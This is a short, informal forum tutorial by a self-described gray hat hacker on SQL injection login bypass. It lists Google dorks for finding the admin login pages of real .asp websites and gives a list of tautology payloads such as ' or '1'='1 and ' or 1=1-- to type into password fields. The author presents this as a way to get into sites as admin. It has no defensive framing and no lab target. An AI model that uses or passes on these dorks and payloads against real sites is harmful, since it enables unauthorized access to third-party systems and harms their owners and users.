Hello every one .i am a sabbir.i am a gray hat hacker.
I am going to share with one of the best of my tutorials here .
Now Let's begin!!
Sql injection (aka Sql Injection or Structured Query Language Injection) is the first step in the entry
to exploiting or hacking websites. It is easily done and it is a great starting off point. Unfortunately
most sqli tutorials suck, so that is why I am writing this one. Sqli is just basically injecting queries
into a database or using queries to get authorization bypass as an admin.
Things you should know :
Data is in the columns and the columns are in tables and the tables are in the database .
Just remember that so you understand the rest .
PART 1 - Bypassing Admin log in ?
Gaining auth bypass on an admin account.Most sites vulnerable to this are .asp
First we need 2 find a site, start by opening google.
Now we type our dork: "defenition of dork" 'a search entry for a certain type of site/exploit .ect"
There is a large number of google dork for basic sql injection.
here is the best:
Code:
"inurl:admin.asp"
"inurl:login/admin.asp"
"inurl:admin/login.asp"
"inurl:adminlogin.asp"
"inurl:adminhome.asp"
"inurl:admin_login.asp"
"inurl:administratorlogin.asp"
"inurl:login/administrator.asp"
"inurl:administrator_login.asp"Now what to do once we get to our site.
the site should look something like this :
ADMIN USERNAME :
PASSWORD :
so what we do here is in the username we always type "Admin"
and for our password we type our sql injection
here is a list of sql injections
Code:
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'
So your input should look like this
username:Admin
password:'or'1'='1
that will confuse the site and give you authorisation to enter as admin
If the site is vulnerable than you are in :Denjoy enjoy enjoy
